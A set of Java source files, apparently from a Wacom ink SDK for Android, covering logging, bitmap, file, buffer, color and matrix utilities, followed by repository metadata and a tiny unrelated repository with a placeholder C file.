				if (Logger.LOG_ENABLED) logger.d("OK, cancel: treat point as up, use prev. x,y");
				return STROKE_EVENT_FORCEEND;
				//Debug: debugHistory.add("13. ACTION_CANCEL lastWritePoint!=null; copy the last point and treat the point as PEN_UP; " + motionEvent);
			} else {
				if (Logger.LOG_ENABLED) logger.d("FAIL, cancel: cancel");
				return failCode;
			}
		}
		if (Logger.LOG_ENABLED) logger.d("FAIL, unknown: ?");
		return failCode;
	}

	// Euclidean-distance jitter filter: movements shorter than MINIMUM_POINT_DISTANCE do not count.
	private static boolean hasReallyMoved(float x, float y, float oldX, float oldY) {
		double dist = Math.sqrt((oldX-x)*(oldX-x)+(oldY-y)*(oldY-y));
		if (dist<MINIMUM_POINT_DISTANCE){
			if (Logger.LOG_ENABLED) logger.d("not 'moved': " + dist);
			return false;
		} else {
			return true;
		}
	}
}
<file_sep>/*
 * Created by <NAME>.
 * Copyright (c) 2013 Wacom. All rights reserved.
 */
package com.wacom.ink.utils;

import android.util.Log;

/**
 * Logger class for fast logging and debugging.
 * Setting LOG_ENABLED to true will enable the debug logging for the java classes.
* */ public class Logger { public static final boolean LOG_ENABLED = false; private String tag; private boolean bEnabled; public Logger(Class<?> javaClass){ this(javaClass, true); } public Logger(Class<?> javaClass, boolean bEnabled){ this(javaClass.getSimpleName(), bEnabled); } public Logger(String tag, boolean bEnabled){ this.tag = tag; this.bEnabled = bEnabled; } public void d(String message){ if (bEnabled){ Log.d(tag, message); } } public void i(String message) { if (bEnabled){ Log.i(tag, message); } } public void e(String message) { if (bEnabled){ Log.e(tag, message); } } public boolean isEnabled(){ return bEnabled; } public void setEnabled(boolean bEnabled){ this.bEnabled = bEnabled; } }<file_sep>package com.wacom.ink.utils; import java.util.LinkedList; public abstract class ReusablePool<T> { private LinkedList<SharedResource<T>> pool; private int maxsize; public ReusablePool(int maxsize){ this.maxsize = maxsize; } public void getSlot(){ SharedResource<T> res = null; if (pool.size()==maxsize){ for (SharedResource<T> resource: pool){ if (!resource.hasOwner()){ res = resource; break; } } if (res==null){ res = pool.getFirst(); res.release(); } } else { pool.add(createSlot()); } } protected abstract SharedResource<T> createSlot(); } <file_sep>/** * Group of classes designed for implementing Protocol Buffer serialization of WILL file format. */ package com.wacom.ink.serialization; <file_sep>/* * Created by <NAME>. * Copyright (c) 2013 Wacom. All rights reserved. 
 */
package com.wacom.ink.utils;

import java.io.ByteArrayOutputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.ByteBuffer;
import java.nio.ByteOrder;
import java.nio.FloatBuffer;
import java.util.List;

import android.app.Activity;
import android.content.ContentResolver;
import android.content.ContentValues;
import android.content.Context;
import android.content.Intent;
import android.graphics.Bitmap;
import android.graphics.Bitmap.CompressFormat;
import android.graphics.Color;
import android.graphics.Matrix;
import android.graphics.Path;
import android.graphics.RectF;
import android.graphics.Region;
import android.net.Uri;
import android.os.Debug;
import android.provider.MediaStore;
import android.util.Log;

/**
 * Utility class.
 */
public class Utils{
	private final static Logger logger = new Logger(Utils.class, true);

	public final static String MIME_PNG = "image/png";
	public final static String EXT_PNG = "png";
	public final static String MIME_JPEG = "image/jpeg";
	public final static String EXT_JPG = "jpg";

	// Indices into the float[4] produced by colorToArray().
	public final static int COLOR_ARR_ALPHA = 0;
	public final static int COLOR_ARR_RED = 1;
	public final static int COLOR_ARR_GREEN = 2;
	public final static int COLOR_ARR_BLUE = 3;

	// Opens an asset (location == null) or a plain file from the given directory.
	public static InputStream openFile(Context context, String filename, String location) throws IOException{
		if (location==null){
			return context.getAssets().open(filename);
		} else {
			return new FileInputStream(new File(location, filename));
		}
	}

	// Unpacks a color into {alpha, red, green, blue}, each in [0..1]; the encoded alpha is kept.
	public static float[] colorToArray(int color){
		return colorToArray(color, -1);
	}

	// Returns value*mul when the condition holds, otherwise value unchanged.
	public static float mulIfTrue(float value, float mul, boolean bCondition){
		if (bCondition){
			return value*mul;
		} else {
			return value;
		}
	}

	// Center-crops the bitmap to the target aspect ratio, then scales it to the target width.
	public static Bitmap cropAndScaleBitmapAtCenterPt(Bitmap bitmap, int width, int height){
		int x, y;
		double sw = bitmap.getWidth();
		double sh = bitmap.getHeight();
		double tw = width;
		double th = height;
		double tr = th/tw; // target aspect ratio (h/w)
		double sr = sh/sw; // source aspect ratio (h/w)
		double cropW = 0;
		double cropH = 0;
		if (Logger.LOG_ENABLED) logger.i("cropAndScaleBitmapAtCenterPt / src: " + sw + "," + sh);
		if (Logger.LOG_ENABLED) logger.i("cropAndScaleBitmapAtCenterPt / target: " + tw + "," + th);
		if (tr>sr){
			// Target is proportionally taller: keep full height, crop the width.
			cropW = sh*(1.0/tr);
			cropH = sh;
			if (Logger.LOG_ENABLED) logger.i("cropAndScaleBitmapAtCenterPt / crop width => sr=" + sr + " tr=" + tr);
		} else {
			// Target is proportionally wider: keep full width, crop the height.
			cropW = sw;
			cropH = sw*tr;
			if (Logger.LOG_ENABLED) logger.i("cropAndScaleBitmapAtCenterPt / crop height => sr=" + sr + " tr=" + tr);
		}
		x = (int) Math.round((sw-cropW)/2);
		y = (int) Math.round((sh-cropH)/2);
		float scaleFactor = (float) (tw/cropW);
		Matrix m = new Matrix();
		m.setScale(scaleFactor, scaleFactor);
		bitmap = Bitmap.createBitmap(bitmap, x, y, (int)Math.round(cropW), (int)Math.round(cropH), m, true);
		if (Logger.LOG_ENABLED) logger.i("cropAndScaleBitmapAtCenterPt / crop | x,y,w,h => " + x + ", " + y + ", " + (int)Math.round(cropW) + ", " + (int)Math.round(cropH));
		if (Logger.LOG_ENABLED) logger.i("cropAndScaleBitmapAtCenterPt / scale | scaleFactor=" + scaleFactor + " => " + (int)Math.round(cropW*scaleFactor) + ", " + (int)Math.round(cropH*scaleFactor));
		return bitmap;
	}

	// Unpacks a color into {alpha, red, green, blue}; a non-negative overwriteAlpha replaces the encoded alpha.
	public static float[] colorToArray(int color, float overwriteAlpha){
		float[] array = new float[4];
		array[0] = (overwriteAlpha>=0)?overwriteAlpha:Color.alpha(color)/255.0f;
		array[1] = Color.red(color)/255.0f;
		array[2] = Color.green(color)/255.0f;
		array[3] = Color.blue(color)/255.0f;
		return array;
	}

	// Logs the message and throws; used as a hard assertion.
	public static void alertAndAssert(String assertMessage) {
		if (Logger.LOG_ENABLED) logger.e(assertMessage);
		throw new RuntimeException("ASSERT: " + assertMessage);
	}

	// Registers an image file with the system MediaStore and returns its content Uri.
	public static Uri insertInMediaStore(ContentResolver contentResolver, File filePath, String imageType){
		Uri uri = null;
		ContentValues values = new ContentValues(2);
		values.put(MediaStore.Images.Media.MIME_TYPE, imageType);
		values.put(MediaStore.Images.Media.DATA, filePath.getAbsolutePath());
		uri = contentResolver.insert( MediaStore.Images.Media.EXTERNAL_CONTENT_URI, values);
		return uri;
	}

	// Starts a GET_CONTENT picker for the given MIME type.
	// NOTE(review): the chooserTitle parameter is accepted but never used.
	public static void startIntentChooseFile(Activity activity, String mime, int requestCode, String chooserTitle){
		Intent intent = new Intent(Intent.ACTION_GET_CONTENT);
		intent.setType(mime);
		activity.startActivityForResult(intent, requestCode);
	}

	// Opens a share chooser for the given Uri; altText (optional) becomes both text and subject extras.
	public static void startIntentSendFile(Context context, String chooserTitle, Uri uri, String mime, String altText){
		Intent intent = new Intent(Intent.ACTION_SEND);
		intent.putExtra(Intent.EXTRA_STREAM, uri);
		intent.setType(mime);
		if (altText!=null){
			intent.putExtra(Intent.EXTRA_TEXT, altText);
			intent.putExtra(Intent.EXTRA_SUBJECT, altText);
		}
		context.startActivity(Intent.createChooser(intent, chooserTitle));
	}

	// Opens the given Uri with the default viewer for its MIME type.
	public static void startIntentViewFile(Context context, Uri uri, String mime){
		Intent intent = new Intent(Intent.ACTION_VIEW);
		intent.setDataAndType(uri, mime);
		context.startActivity(intent);
	}

	public static boolean saveJPEG(Bitmap bitmap, String fname){
		return saveImage(bitmap, fname, CompressFormat.JPEG, 100);
	}

	public static boolean saveJPEG(Bitmap bitmap, String fname, int quality){
		return saveImage(bitmap, fname, CompressFormat.JPEG, quality);
	}

	// PNG is lossless; Bitmap.compress ignores the quality argument for PNG.
	public static boolean savePNG(Bitmap bitmap, String fname){
		return saveImage(bitmap, fname, CompressFormat.PNG, 0);
	}

	// Writes the bitmap to disk in the given format; returns true on success.
	// NOTE(review): if the FileOutputStream constructor throws, 'output' stays null and the
	// close() in the finally block raises a (swallowed) NullPointerException — confirm/harden.
	public static boolean saveImage(Bitmap bitmap, String fname, Bitmap.CompressFormat fileFormat, int quality){
		FileOutputStream output = null;
		boolean bSuccess = false;
		try {
			output = new FileOutputStream(new File(fname));
			bitmap.compress(fileFormat, quality, output);
			output.close();
			bSuccess = true;
		} catch (FileNotFoundException e) {
			e.printStackTrace();
		} catch (IOException e) {
			e.printStackTrace();
		} finally {
			if (!bSuccess){
				try{
					output.close();
				} catch (Exception ex){
				}
			}
		}
		return bSuccess;
	}

	// Linearly maps value from [minValue, maxValue] into [dstMinValue, dstMaxValue]; asserts on invalid input.
	public static float transformValue(float value, float minValue, float maxValue, float dstMinValue, float dstMaxValue){
		if (minValue>=maxValue){
			Utils.alertAndAssert("transformValue / minValue exceeds maxValue");
		}
		if (dstMinValue>=dstMaxValue){
			Utils.alertAndAssert("transformValue / dstMinValue exceeds dstMaxValue");
		}
		if (value<minValue || value>maxValue){
			Utils.alertAndAssert("transformValue / value outside required range.");
		}
		float res = dstMinValue + (value-minValue)*(dstMaxValue-dstMinValue)/(maxValue-minValue);
		return res;
	}

	// Simple throughput profiler: call tick() before and tock() after the measured section;
	// after 'count' samples the average duration and rate are logged and the counters reset.
	public static class TickTock{
		private long tickTs;
		private long tockTs;
		private float tps;
		private long count;
		private long index;
		private long totalTime;
		private String logString;

		public TickTock(String logString, int count){
			this.count = count;
			this.logString = logString;
		}

		public void tick(){
			tickTs = System.currentTimeMillis();
		}

		public void tock(){
			// Ignore tock() calls that were not preceded by a tick().
			if (tickTs==0){
				return;
			}
			tockTs = System.currentTimeMillis();
			index++;
			if (tickTs>0){
				totalTime += tockTs-tickTs;
			}
			if (index==count){
				tps = (1000.0f / ((float)totalTime/(float)count));
				if (Logger.LOG_ENABLED) logger.d(logString + " tps: " + tps + " avg: " + ((float)totalTime/count));
				reset();
			}
		}

		public void reset(){
			index = 0;
			tps = 0;
			tockTs = 0;
			tickTs = 0;
			totalTime = 0;
		}
	}

	// Dumps native/Java heap statistics to the log (only when logging is compiled in).
	public static void printMemoryInfo(String tag){
		if (Logger.LOG_ENABLED){
			logger.i(tag + " nativeHeapSize: " + Debug.getNativeHeapSize()/1024.0f + " kb.");
			logger.i(tag + " nativeHeapAllocatedSize: " + Debug.getNativeHeapAllocatedSize()/1024.0f + " kb.");
			logger.i(tag + " nativeHeapFreeSize: " + Debug.getNativeHeapFreeSize()/1024.0f + " kb.");
			logger.i(tag + " freeMemory: " + Runtime.getRuntime().freeMemory()/1024.0f + " kb.");
			logger.i(tag + " totalMemory: " + Runtime.getRuntime().totalMemory()/1024.0f + " kb.");
			logger.i(tag + " maxMemory: " + Runtime.getRuntime().maxMemory()/1024.0f + " kb.");
			logger.i(tag + " availableProcessors: " + Runtime.getRuntime().availableProcessors());
		}
	}

	// Returns v, or the fallback when v is NaN.
	public static float getNonNan(float v, float alt){
		if (Float.isNaN(v)){
			return alt;
		} else {
			return v;
		}
	}

	public static boolean 
isPointInsideClosedPath(Path path, float x, float y){ return isPointInsideClosedPath(path, (int)x, (int)y); } public static boolean isPointInsideClosedPath(Path path, int x, int y){ RectF rectF = new RectF(); path.computeBounds(rectF, true); Region region = new Region(); region.setPath(path, new Region((int) rectF.left, (int) rectF.top, (int) rectF.right, (int) rectF.bottom)); //logger.e("isPointInsideClosedPath: " + region.contains(x, y) + "/" + x + "," + y + " / " + rectF.toShortString() + " / " + region.toString()); return region.contains(x, y); } public static String[] splitFilenameAndExt(String filename){ int dotPos = filename.lastIndexOf("."); if (dotPos>-1 && dotPos<filename.length()-1){ String res[] = new String[2]; res[0] = filename.substring(0, dotPos); res[1] = filename.substring(dotPos+1); return res; } else { return null; } } public static Bitmap recycleBitmap(Bitmap bitmap){ if (bitmap!=null){ if (!bitmap.isRecycled()){ bitmap.recycle(); } bitmap = null; } return null; } public static String getTrimmedNonNullStr(String string) { return string==null?"":string.trim(); } public static File copyFile(Uri uri, String destination){ return copyFile(uri, destination, null); } public static File copyFile(Uri uri, String destination, String saveAsFilename){ File destinationFile = new File(destination); File sourceFile = new File(uri.getPath()); if (!sourceFile.isFile() && !sourceFile.exists()){ return null; } if (saveAsFilename!=null && destinationFile.isDirectory()){ destinationFile = new File(destination, saveAsFilename); } else if (destinationFile.isDirectory()){ destinationFile = new File(destination, sourceFile.getName()); } else if (destinationFile.isFile() && destinationFile.exists()){ destinationFile.delete(); } else { return null; } InputStream in = null; OutputStream out = null; boolean bSuccess = true; try { in = new FileInputStream(sourceFile); out = new FileOutputStream(destinationFile); byte[] buf = new byte[128*1024]; int len; while ((len = 
in.read(buf)) > 0) { out.write(buf, 0, len); } in.close(); out.close(); } catch (FileNotFoundException e) { e.printStackTrace(); bSuccess = false; } catch (IOException e) { e.printStackTrace(); bSuccess = false; } finally { try { in.close(); } catch (Exception e) { e.printStackTrace(); } try { out.close(); } catch (Exception e) { e.printStackTrace(); } in = null; out = null; } return bSuccess?destinationFile:null; } public static FloatBuffer createNativeFloatBuffer(FloatBuffer source, int sourcePosition, int size){ FloatBuffer buffer = createNativeFloatBuffer(size); copyFloatBuffer(source, buffer, sourcePosition, 0, size); return buffer; } public static FloatBuffer createNativeFloatBuffer(int initialCount){ return ByteBuffer.allocateDirect(initialCount*Float.SIZE/Byte.SIZE).order(ByteOrder.nativeOrder()).asFloatBuffer(); } public static FloatBuffer createNativeFloatBufferBySize(int size){ return ByteBuffer.allocateDirect(size*Float.SIZE/Byte.SIZE).order(ByteOrder.nativeOrder()).asFloatBuffer(); } public static FloatBuffer reallocNativeFloatBuffer(FloatBuffer buffer, int capacity){ if (buffer==null || capacity>buffer.capacity()){ buffer = createNativeFloatBuffer(capacity); } return buffer; } public static void assertBufferCapacity(ByteBuffer buffer, int capacity){ if (buffer==null || capacity>buffer.capacity()){ alertAndAssert("Buffer too small."); } } public static ByteBuffer createNativeByteBuffer(int initialCount){ return ByteBuffer.allocateDirect(initialCount).order(ByteOrder.nativeOrder()); } public static ByteBuffer createNativeByteBuffer(byte[] bytes){ ByteBuffer buffer = createNativeByteBuffer(bytes.length); buffer.position(0); buffer.put(bytes); return buffer; } public static ByteBuffer createNativeByteBuffer(byte[] bytes, int offset, int bytesCount){ ByteBuffer buffer = createNativeByteBuffer(bytesCount); buffer.position(0); buffer.put(bytes, offset, bytesCount); buffer.position(0); return buffer; } public static ByteBuffer 
reallocNativeByteBuffer(ByteBuffer buffer, int capacity){ if (buffer==null || capacity>buffer.capacity()){ if (Logger.LOG_ENABLED) logger.i("reallocNativeByteBuffer: " + buffer + " / current capacity=" + (buffer!=null?buffer.capacity():0) + "; requested capacity=" + capacity); buffer = createNativeByteBuffer(capacity); } return buffer; } public static void dumpBuffer(String msg, ByteBuffer buffer, int pos, int size, int stride){ if (!Logger.LOG_ENABLED || !logger.isEnabled()){ return; } int cnt=0; String line; logger.e("Dumping buffer[I] [" + msg + "]; size=" + size + ", stride=" + stride + ", limit=" + buffer.limit() + " / " + pos + "," + size); buffer.position(pos); for (int i=0;i<=(size/stride)-1;i++){ cnt++; line = ""; for (int s=0;s<stride;s++){ line += (line.length()!=0?", ":" ") + buffer.get(); } logger.e("BUFFER_DUMP[I] [" + msg + "] [" + cnt + "]" + line); } } public static void checkChangedBuffer(String msg, ByteBuffer buffer, int pos, int size){ if (!Logger.LOG_ENABLED || !logger.isEnabled()){ return; } int bChangedElements = 0; buffer.position(pos); for (int i=0;i<=size-1;i++){ if (buffer.get()!=0){ bChangedElements++; } } logger.e("checkChangedBuffer: " + bChangedElements + " of " + size); } public static void dumpBuffer(String msg, FloatBuffer buffer, int pos, int size, int stride){ if (!Logger.LOG_ENABLED || !logger.isEnabled()){ return; } int cnt=0; String line; logger.e("BUFFER_DUMP Dumping buffer[F] [" + msg + "]; size=" + size + ", stride=" + stride + ", limit=" + buffer.limit() + " / " + pos + "," + size); buffer.position(pos); for (int i=0;i<=(size/stride)-1;i++){ cnt++; line = ""; for (int s=0;s<stride;s++){ line += (line.length()!=0?", ":" ") + buffer.get(); } logger.e("BUFFER_DUMP [" + msg + "] [" + cnt + "]" + line); } } public static void copyFloatBuffer(FloatBuffer source, FloatBuffer destination, int sourcePosition, int destinationPosition, int size){ if (sourcePosition>=0){ source.position(sourcePosition); } if (destinationPosition>=0){ 
destination.position(destinationPosition); } for (int i=0;i<size;i++){ destination.put(source.get()); } } public static float getFloatBufferPointValue(FloatBuffer buffer, int position, int pointIndex, int stride, int channel){ return buffer.get(position + pointIndex*stride + channel); } public static void fillPath(Path path, FloatBuffer buffer, int size, int stride, int position){ fillPath(path, buffer, size, stride, position, 0, 1); } public static void fillPath(Path path, FloatBuffer buffer, int size, int stride, int position, int x, int y){ path.reset(); int n = size/stride; for (int i = 1; i<n-2; i++){ if (i==1){ path.moveTo(getFloatBufferPointValue(buffer, position, i, stride, x), getFloatBufferPointValue(buffer, position, i, stride, y)); } if (i<n-3){ //CatmullRom to bezier float bufferX[] = {getFloatBufferPointValue(buffer, position, i+0, stride, x), getFloatBufferPointValue(buffer, position, i+1, stride, x), getFloatBufferPointValue(buffer, position, i+2, stride, x), getFloatBufferPointValue(buffer, position, i+3, stride, x)}; float bufferY[] = {getFloatBufferPointValue(buffer, position, i+0, stride, y), getFloatBufferPointValue(buffer, position, i+1, stride, y), getFloatBufferPointValue(buffer, position, i+2, stride, y), getFloatBufferPointValue(buffer, position, i+3, stride, y)}; float one6th = 0.166666666666f; float bx1 = -one6th * bufferX[0] + bufferX[1] + one6th * bufferX[2]; float bx2 = +one6th * bufferX[1] + bufferX[2] - one6th * bufferX[3]; float bx3 = bufferX[2]; float by1 = -one6th * bufferY[0] + bufferY[1] + one6th * bufferY[2]; float by2 = +one6th * bufferY[1] + bufferY[2] - one6th * bufferY[3]; float by3 = bufferY[2]; path.cubicTo(bx1, by1, bx2, by2, bx3, by3); } if (i==n-3){ path.close(); } } } static public <T> void addAllToList(List<T> source, List<T> destination){ for (T item: source){ if (!destination.contains(item)){ destination.add(item); } } } static public int resGetInt(Context context, int resId){ return 
context.getResources().getInteger(resId); } public static double calcDistance(float x1, float y1, float x2, float y2) { return Math.sqrt((x1-x2)*(x1-x2) + (y1-y2)*(y1-y2)); } private static int NEXT_FILENAME_IDX = 0; public static String generateUniqueString(){ NEXT_FILENAME_IDX = (NEXT_FILENAME_IDX+1)==100?NEXT_FILENAME_IDX=0:NEXT_FILENAME_IDX+1; return System.currentTimeMillis() + "-" + 10000 + (int)(Math.random()*9999) + "-" + 1000 + NEXT_FILENAME_IDX; } public int convertColorComponentToInt(float component){ return (int)(component * 0xFF); } public int convertARGBFloatComponentsToIntColor(float a, float r, float g, float b){ return convertARGBIntComponentsToIntColor(convertColorComponentToInt(a), convertColorComponentToInt(r), convertColorComponentToInt(g), convertColorComponentToInt(b)); } public int convertARGBIntComponentsToIntColor(int a, int r, int g, int b){ a = (a << 24) & 0xFF000000; r = (r << 16) & 0x00FF0000; g = (g << 8) & 0x0000FF00; b = b & 0x000000FF; return a | r | g | b; } public static int convertIntARGBColorToIntRGBColor(int intARGBColor){ return intARGBColor & 0x00FFFFFF; } public static int convertIntRGBColorToIntARGBColor(int intRGBColor) { return intRGBColor | 0xFF000000; } public static int convertIntARGBColorToIntRGBAColor(int intARGBColor){ return ((intARGBColor&0xff000000)>>>24) | ((intARGBColor&0x00ffffff)<<8); } public static int convertIntRGBAColorToIntARGBColor(int intRGBAColor) { return ((intRGBAColor&0xffffff00)>>>8) | ((intRGBAColor&0xff)<<24); } public static int premultiplyIntColor(int color) { return Color.argb(Color.alpha(color), mul255(Color.red(color), Color.alpha(color)), mul255(Color.green(color), Color.alpha(color)), mul255(Color.blue(color), Color.alpha(color))); } private static int mul255(int c, int a) { int prod = c * a + 128; return (prod + (prod >> 8)) >> 8; } public static int premultiplyColor(int c) { int r = Color.red(c); int g = Color.green(c); int b = Color.blue(c); int a = Color.alpha(c); // now apply the 
alpha to r, g, b r = mul255(r, a); g = mul255(g, a); b = mul255(b, a); // now pack it in the correct order return pack8888(r, g, b, a); } private static int pack8888(int r, int g, int b, int a) { return (r << 0) | ( g << 8) | (b << 16) | (a << 24); } public static void invalidateRectF(RectF rect){ rect.left = Float.NaN; rect.right = Float.NaN; rect.top = Float.NaN; rect.bottom = Float.NaN; } public static void uniteWith(RectF rect, RectF uniteWithRect){ if (Float.isNaN(rect.left)){ rect.left = uniteWithRect.left; } else { rect.left = Math.min(rect.left, uniteWithRect.left); } if (Float.isNaN(rect.right)){ rect.right = uniteWithRect.right; } else { rect.right = Math.max(rect.right, uniteWithRect.right); } if (Float.isNaN(rect.top)){ rect.top = uniteWithRect.top; } else { rect.top = Math.min(rect.top, uniteWithRect.top); } if (Float.isNaN(rect.bottom)){ rect.bottom = uniteWithRect.bottom; } else { rect.bottom = Math.max(rect.bottom, uniteWithRect.bottom); } } public static boolean saveBinaryFile(Uri uri, ByteBuffer buffer, int position, int size){ File file = new File(uri.getPath()); if (file.exists()){ file.delete(); } OutputStream out = null; boolean bSuccess = true; try { out = new FileOutputStream(file); byte[] buf = new byte[256*1024]; buffer.position(0); int len; while (buffer.position()<buffer.limit()-1){ len = Math.min(buf.length, buffer.remaining()); buffer.get(buf, 0, len); out.write(buf, 0, len); } out.close(); } catch (FileNotFoundException e) { e.printStackTrace(); bSuccess = false; } catch (IOException e) { e.printStackTrace(); bSuccess = false; } finally { try { out.close(); } catch (Exception e) { e.printStackTrace(); } out = null; } return bSuccess; } public static ByteBuffer loadBinaryFile(InputStream in){ ByteBuffer buffer = null; ByteArrayOutputStream os = new ByteArrayOutputStream(); boolean bSuccess = true; try { byte[] buf = new byte[256*1024]; int len; while ((len = in.read(buf)) > 0) { os.write(buf, 0, len); } in.close(); } catch 
(FileNotFoundException e) { e.printStackTrace(); bSuccess = false; } catch (IOException e) { e.printStackTrace(); bSuccess = false; } finally { Log.e("BUF", "BUFFER222: " + os.toByteArray().length); buffer = Utils.createNativeByteBuffer(os.toByteArray()); try { in.close(); } catch (Exception e) { e.printStackTrace(); } try { os.close(); } catch (Exception e) { e.printStackTrace(); } } return bSuccess?buffer:null; } public static ByteBuffer loadBinaryFile(Uri uri){ return loadBinaryFile(uri, null, 0); } public static ByteBuffer loadBinaryFile(Uri uri, ByteBuffer optionalInBuffer, int optionalPosition){ File file = new File(uri.getPath()); if (!file.exists()){ return null; } ByteBuffer buffer = null; InputStream in = null; boolean bSuccess = true; try { in = new FileInputStream(file); byte[] buf = new byte[256*1024]; int len; buffer = Utils.reallocNativeByteBuffer(optionalInBuffer, optionalPosition + (int)file.length()); buffer.position(0); while ((len = in.read(buf)) > 0) { buffer.put(buf, 0, len); } in.close(); } catch (FileNotFoundException e) { e.printStackTrace(); bSuccess = false; } catch (IOException e) { e.printStackTrace(); bSuccess = false; } finally { try { in.close(); } catch (Exception e) { e.printStackTrace(); } in = null; } return bSuccess?buffer:null; } }<file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. 
*/ package com.wacom.ink.geometry; public class WVec2 { public float x; public float y; public float z; /** * @hide */ public long handle; private native long nativeInitialize(); private native void nativeFinalize(long handle); private native float nativeGetX(long handle); private native float nativeGetY(long handle); private native void nativeSetX(long handle, float value); private native void nativeSetY(long handle, float value); public WVec2(){ this(0, 0); } public WVec2(float x, float y) { handle = nativeInitialize(); set(x, y); } public float getX(){ return nativeGetX(handle); } public float getY(){ return nativeGetY(handle); } public void setX(float value){ nativeSetX(handle, value); } public void setY(float value){ nativeSetY(handle, value); } public void set(float x, float y){ setX(x); setY(y); } public void setInf(){ setX(Float.POSITIVE_INFINITY); setY(Float.POSITIVE_INFINITY); } @Override protected void finalize() throws Throwable { super.finalize(); nativeFinalize(handle); } static { System.loadLibrary("InkingEngine"); } } <file_sep>/* * Created by <NAME>. * Copyright (c) 2014 Wacom. All rights reserved. */ package com.wacom.ink.utils; /** * Class containing utility functions for matrix operations. 
* */ import android.graphics.Matrix; public class Mx{ private static Logger logger = new Logger(Mx.class); public static float transformPtX(Matrix mx, float x){ float[] pts = new float[]{x, 0}; mx.mapPoints(pts); return pts[0]; } public static float transformPtY(Matrix mx, float y){ float[] pts = new float[]{0, y}; mx.mapPoints(pts); return pts[1]; } public static float[] convertToRowMajor4x4Matrix(float[] mx4x4, float[] mx3x3){ mx4x4[0] = mx3x3[0]; mx4x4[1] = mx3x3[1]; mx4x4[2] = mx3x3[2]; mx4x4[3] = 0; mx4x4[4] = mx3x3[3]; mx4x4[5] = mx3x3[4]; mx4x4[6] = mx3x3[5]; mx4x4[7] = 0; mx4x4[8] = mx3x3[6]; mx4x4[9] = mx3x3[7]; mx4x4[10] = mx3x3[8]; mx4x4[11] = 0; mx4x4[12] = 0; mx4x4[13] = 0; mx4x4[14] = 0; mx4x4[15] = 1; return mx4x4; } public static void limitMatrix(Matrix mx, float minS, float maxS, float width, float height){ float[] v = new float[9]; mx.getValues(v); boolean bFixed = false; if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX before fix: " + mx.toShortString()); if (v[Matrix.MSCALE_X]>maxS){ mx.postScale(maxS/v[Matrix.MSCALE_X], maxS/v[Matrix.MSCALE_X], width/2, height/2); if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX limit scale: " + v[Matrix.MSCALE_X] + ">" + maxS); bFixed = true; } if (v[Matrix.MSCALE_X]<minS){ mx.postScale(minS/v[Matrix.MSCALE_X], minS/v[Matrix.MSCALE_X], width/2, height/2); if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX limit scale: " + v[Matrix.MSCALE_X] + "<" + minS); bFixed = true; } if (Mx.transformPtX(mx, 0)>0){ mx.postTranslate(-Mx.transformPtX(mx, 0), 0); if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX fix translation (1)"); bFixed = true; } if (Mx.transformPtY(mx, 0)>0){ mx.postTranslate(0, -Mx.transformPtY(mx, 0)); if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX fix translation (2)"); bFixed = true; } if (Mx.transformPtX(mx, width)<width){ mx.postTranslate(width - Mx.transformPtX(mx, width), 0); if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX fix translation (3)"); bFixed = true; } if (Mx.transformPtY(mx, height)<height){ 
mx.postTranslate(0, height - Mx.transformPtY(mx, height)); if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX fix translation (4)"); bFixed = true; } if (bFixed){ if (Logger.LOG_ENABLED) logger.i("LIMIT_MATRIX after fix: " + mx.toShortString()); } } public static float[] convertToColumnMajor4x4Matrix(float[] mx4x4, float[] mx3x3){ mx4x4[0] = mx3x3[0]; mx4x4[4] = mx3x3[1]; mx4x4[8] = mx3x3[2]; mx4x4[12] = 0; mx4x4[1] = mx3x3[3]; mx4x4[5] = mx3x3[4]; mx4x4[9] = mx3x3[5]; mx4x4[13] = 0; mx4x4[2] = mx3x3[6]; mx4x4[6] = mx3x3[7]; mx4x4[10] = mx3x3[8]; mx4x4[14] = 0; mx4x4[3] = 0; mx4x4[7] = 0; mx4x4[11] = 0; mx4x4[15] = 1; return mx4x4; } public static float[] convertTo4x4Matrix(float[] mx4x4, float[] mx3x3){ mx4x4[0] = mx3x3[0]; mx4x4[1] = mx3x3[1]; mx4x4[2] = 0; mx4x4[3] = mx3x3[2]; mx4x4[4] = mx3x3[3]; mx4x4[5] = mx3x3[4]; mx4x4[6] = 0; mx4x4[7] = mx3x3[5]; mx4x4[8] = 0; mx4x4[9] = 0; mx4x4[10] = 1; mx4x4[11] = 0; mx4x4[12] = mx3x3[6]; mx4x4[13] = mx3x3[7]; mx4x4[14] = 0; mx4x4[15] = mx3x3[8]; mx4x4[0] = mx3x3[Matrix.MSCALE_X]; mx4x4[1] = mx3x3[Matrix.MSKEW_X]; mx4x4[2] = 0; mx4x4[3] = mx3x3[Matrix.MTRANS_X]; mx4x4[4] = mx3x3[Matrix.MSKEW_Y]; mx4x4[5] = mx3x3[Matrix.MSCALE_Y]; mx4x4[6] = 0; mx4x4[7] = mx3x3[Matrix.MTRANS_Y]; mx4x4[8] = 0; mx4x4[9] = 0; mx4x4[10] = 1; mx4x4[11] = 0; mx4x4[12] = 0; mx4x4[13] = 0; mx4x4[14] = 0; mx4x4[15] = 1; // for (int r=0;r<3;r++){ // Log.e("convertTo4x4Matrix", "3x3 | mx[" + r+ "] " + mx3x3[r*3] + " " + mx3x3[r*3+1] + " " + mx3x3[r*3+2]); // } // // for (int r=0;r<4;r++){ // Log.e("convertTo4x4Matrix", "4x4 | mx[" + r+ "] " + mx4x4[r*4] + " " + mx4x4[r*4+1] + " " + mx4x4[r*4+2] + " " + mx4x4[r*4+3]); // } return mx4x4; } public static float getScaleFactorX(Matrix mx){ float[] v = new float[9]; mx.getValues(v); return v[Matrix.MSCALE_X]; } }
7ca92460df68d9933362656accc65c939591015c
[ "Java" ]
20
Java
orsinil/com.phonegap.will.simple
5c7671c5d659d5620fd198046c11693e80ae533c
07c6ec0ce0d172bdd4ccf9ad564fa5275981ac76
refs/heads/master
<repo_name>MulajEgzon/test<file_sep>/test.c deri qitash banum hajgare hajde tash punojm pernime .c.c.c.c.c.
2b902bc06616ea499fa3645d837a14c4abdf5073
[ "C" ]
1
C
MulajEgzon/test
